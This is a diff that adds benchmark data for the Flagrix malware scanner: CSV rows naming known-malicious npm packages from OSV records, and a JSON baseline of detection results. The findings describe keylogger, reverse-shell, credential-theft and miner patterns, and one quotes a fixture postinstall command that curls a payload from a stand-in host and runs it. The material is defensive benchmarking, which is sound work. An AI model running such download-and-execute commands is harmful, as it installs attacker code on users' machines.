+"malicious-osv-mal-2025-15238","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090:30af885d0884dd6cec7fdbfb7ba0a3248110b517","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2023-116","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466:216fcbc2c9356dbccfd103971f088bcb84682b06","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-4813","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392:2bae461ccd66abc5ecc0082b8681a81c125302b6","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-190832","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-190832; report blob b9b988a111a6e0915333f4b29ce75fb1fe05f293","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293:6ac5ebe76f27904cfdec2d27badfa7ad53d6f11d","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2024-10692","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907:4a871bf8d97a4ffd916e71d4102e1a09b3d38d6d","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-191389","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a:5a611b4143b8b29595533761d56448dc59603cd8","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2026-2631","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa:4f055c91abd296b619826fad2bb36752f7f939a7","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-47613","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350:2aaacc868e3b819e0e9d4dbb9a9d58b5d83906ff","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2026-407","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a:9897f3726f56deb821827c8de18501abead258f2","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15287","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15287; report blob 910018e9ea790fae8a6c9141550913cf26e5275d","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d:8082edb8ce35bdad9a7e5c961b346e42d7d218a3","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15288","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03:c79c0836d3e4e5c0e39da8e406463977b538d0d7","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-3985","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343:655664c120057afcca26233ac537a2622d3d7e2c","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" diff --git a/benchmark/results/pre-fix-baseline.json b/benchmark/results/pre-fix-baseline.json new file mode 100644 index 0000000..df84c1b --- /dev/null +++ b/benchmark/results/pre-fix-baseline.json @@ -0,0 +1,4997 @@ +{ + "metadata": { + "benchmarkVersion": "0.1.0", + "runAt": "2026-07-13T11:34:01.995Z", + "corpusPath": "/Users/tomas.tilnak/Documents/Codex/2026-07-12/ca/work/flagrix/flagrix-cli/benchmark/corpus.lock.json", + "cliVersion": "0.1.3", + "engineVersion": "0.2.2", + "engineCommitSha": "8c56989d719efb88051d0ac4d319abcdf63649fe", + "engineDirty": true, + "rulesVersion": "2026.07.12.002", + "rulesCommitSha": "193cd4906826ed458976c1f7b9b56bacc09019dd", + "rulesDirty": true + }, + "metrics": { + "samplesDefined": 90, + "samplesCompleted": 90, + "samplesPassed": 37, + "criticalFixturesDetected": 9, + "criticalFixturesTotal": 10, + "criticalFixtureDetectionRate": 0.9, + "maliciousSamplesDetected": 5, + "maliciousSamplesTotal": 25, + "maliciousDetectionRate": 0.2, + "referenceSamplesTotal": 55, + "referenceHighVerdicts": 27, + "referenceHighVerdictRate": 0.4909090909090909, + "referenceSamplesWithHighOrCriticalFindings": 30, + "referenceCriticalFindings": 16, + "gates": { + "criticalFixtures100Percent": false, + "maliciousDetectionAtLeast90Percent": false, + "zeroCriticalReferenceFindings": false, + "referenceHighVerdictsAtMost5Percent": false + } + }, + "results": [ + { + "sampleId": "critical-keylogger-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed behavior: keyboard capture plus network sink", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:47ddfcaf4652dcead3194f3be5f4bdc8e1b43742", + "expectedDetectionCategories": [ + "EXFIL_KEYLOGGER" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "EXFIL_KEYLOGGER" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_KEYLOGGER", + "file": "src/fixture.js", + "line": 1, + "description": "Reads pressed keys from a keyboard handler and stores or transmits them" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 30, + "error": "" + }, + { + "sampleId": "critical-beavertail-loader-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Lazarus BeaverTail loader structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:cd28e14b93bd48d8fc52714787299569897f6408", + "expectedDetectionCategories": [ + "BEAVERTAIL_LOADER_V1" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "BEAVERTAIL_LOADER_V1" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_LOADER_V1", + "file": "src/fixture.js", + "line": 1, + "description": "Matches BeaverTail malware loader pattern used by Lazarus Group in fake job interview repos" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 3, + "error": "" + }, + { + "sampleId": "critical-env-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed environment-variable exfiltration structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:11214d0e6bf271f10d443bf17c16d83232e2f297", + "expectedDetectionCategories": [ + "BEAVERTAIL_EXFIL" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-reverse-shell-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed reverse-shell socket structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:7153bab0dd4955bc942b4d68228a6f16d416a328", + "expectedDetectionCategories": [ + "REVERSE_SHELL" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "REVERSE_SHELL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "REVERSE_SHELL", + "file": "src/fixture.js", + "line": 1, + "description": "Socket-based reverse shell connection — creates a TCP connection back to attacker" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-crypto-miner-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed cryptocurrency-miner endpoint structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:09955ea0b3c26412934cd61e99cc25a921f8c943", + "expectedDetectionCategories": [ + "CRYPTO_MINER" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "CRYPTO_MINER" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "CRYPTO_MINER", + "file": "src/fixture.js", + "line": 1, + "description": "Cryptocurrency mining code — uses CPU resources for attacker profit" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-obfuscated-eval-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Base64-decoded dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:3f60ed22624352d562b694600d87f7a37bf81fe3", + "expectedDetectionCategories": [ + "OBFUSCATED_EVAL" + ], + "minimumExpectedVerdict": "medium", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "medium", + "actualScore": 0.5, + "safeToClone": false, + "rulesTriggered": [ + "OBFUSCATED_EVAL", + "OBF_EVAL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBFUSCATED_EVAL", + "file": "src/fixture.js", + "line": 1, + "description": "Base64-encoded eval execution — decodes and executes hidden payload" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/fixture.js", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-rce-endpoint-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed request-driven remote-code-execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:e4084292f92b05d88db1c0b433a74ab63e8ff3ca", + "expectedDetectionCategories": [ + "BACKDOOR_RCE_ENDPOINT" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.65, + "safeToClone": false, + "rulesTriggered": [ + "BACKDOOR_RCE_ENDPOINT", + "OBF_EVAL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BACKDOOR_RCE_ENDPOINT", + "file": "src/fixture.js", + "line": 1, + "description": "eval() or exec() fed from HTTP request body/query — allows attacker to run arbitrary code" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/fixture.js", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-credential-file-read-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed credential-file access structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:895568b6b685834b3d6cf7186308ccc7f23f3cbe", + "expectedDetectionCategories": [ + "FILE_ACCESS_CREDENTIALS" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "FILE_ACCESS_CREDENTIALS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "FILE_ACCESS_CREDENTIALS", + "file": "src/fixture.js", + "line": 1, + "description": "Reads ~/.ssh/, ~/.aws/, id_rsa, or credentials files — credential theft" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "critical-aws-key-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed AWS access-key pattern using a reserved dummy value", + "sourceUrl": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html", + "immutableRef": "fixture-v1:a1296c58a00d76c777714d5d8b3d877227a0558d", + "expectedDetectionCategories": [ + "HARDCODED_AWS_KEY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "HARDCODED_AWS_KEY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": "src/fixture.js", + "line": 1, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-install-script-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed install-time download and dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1:611f7347091fa4506e2f4ef8884a30fd011f7314", + "expectedDetectionCategories": [ + "POSTINSTALL_SCRIPT" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.65, + "safeToClone": false, + "rulesTriggered": [ + "POSTINSTALL_SCRIPT" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "POSTINSTALL_SCRIPT", + "rule": "POSTINSTALL_SCRIPT", + "file": "package.json", + "line": null, + "description": "postinstall script makes network requests: \"curl https://example.invalid/payload && node -e \"e...\"" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "POSTINSTALL_SCRIPT", + "rule": "POSTINSTALL_SCRIPT", + "file": "package.json", + "line": null, + "description": "postinstall script executes dynamic code" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-keyboard-shortcut-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for ordinary keyboard UI handling", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1:0ffca52988c432109773a57e23c338551b9c51b8", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-placeholder-secret-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for documented placeholder configuration", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1:d55f3f65c602eb1f695a587f61db7d635bfa1ad7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.05, + "safeToClone": true, + "rulesTriggered": [ + "HARDCODED_API_KEY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "low", + "confidence": "high", + "type": "INSECURE_CONFIGURATION", + "rule": "HARDCODED_API_KEY", + "file": "app.py", + "line": 1, + "description": "Predictable placeholder secret must be replaced before deployment" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-flask-debug-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control: deployment warning must not be labeled a backdoor", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1:18c530bc5c541ea2a330c43493279fc8e9686e26", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.05, + "safeToClone": true, + "rulesTriggered": [ + "INSECURE_CONFIGURATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "low", + "confidence": "high", + "type": "INSECURE_CONFIGURATION", + "rule": "INSECURE_CONFIGURATION", + "file": "app.py", + "line": 1, + "description": "Flask debugger is exposed on all network interfaces; disable debug mode before deployment" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "reference-fixture-detector-regex-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for security tools containing inert detector regexes", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1:977043432c1a3f3ec5c5914bcdbb96c33c6e8995", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-event-stream-safe-version-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Version-bound negative control for the compromised event-stream 3.3.6 incident", + "sourceUrl": "https://github.com/dominictarr/event-stream", + "immutableRef": "package:event-stream@4.0.1:4989205f2c15c653baf5fd41bbacb8a7f6d55bad", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.25, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: event-stream" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "reference-express", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/expressjs/express", + "immutableRef": "ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.85, + "safeToClone": false, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBF_EVAL" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "test/express.json.js", + "line": 148, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "test/express.raw.js", + "line": 112, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "test/express.text.js", + "line": 121, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "test/express.urlencoded.js", + "line": 221, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "test/res.redirect.js", + "line": 115, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + } + ], + "filesScanned": 151, + "filesSkipped": 62, + "treeTruncated": false, + "durationMs": 282608, + "error": "" + }, + { + "sampleId": "reference-fastify", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/fastify/fastify", + "immutableRef": "de3752df84bb8dd35a8226bb467f05862f4da57c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.24, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "lib/config-validator.js", + "line": 1039, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "lib/schemas.js", + "line": 23, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 193, + "treeTruncated": false, + "durationMs": 3773, + "error": "" + }, + { + "sampleId": "reference-koa", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/koajs/koa", + "immutableRef": "52d5e8ff5ac79f2479463b53df2999900ae95115", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 84, + "filesSkipped": 27, + "treeTruncated": false, + "durationMs": 2708, + "error": "" + }, + { + "sampleId": "reference-axios", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + 